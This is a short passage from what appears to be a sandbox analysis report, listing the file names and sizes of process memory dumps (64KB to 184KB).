                                                                                                64KB

                                                                                              • memory/2868-101-0x00007FFC285F0000-0x00007FFC28600000-memory.dmp

                                                                                                Filesize

                                                                                                64KB

                                                                                              • memory/2896-112-0x00007FFC285F0000-0x00007FFC28600000-memory.dmp

                                                                                                Filesize

                                                                                                64KB

                                                                                              • memory/3160-145-0x00000179CD390000-0x00000179CD3BE000-memory.dmp

                                                                                                Filesize

                                                                                                184KB

                                                                                              • memory/3500-51-0x0000000006EA0000-0x0000000006ECA000-memory.dmp

                                                                                                Filesize

                                                                                                168KB

                                                                                              • memory/3500-98-0x00007FFC285F0000-0x00007FFC28600000-memory.dmp

                                                                                                Filesize

                                                                                                64KB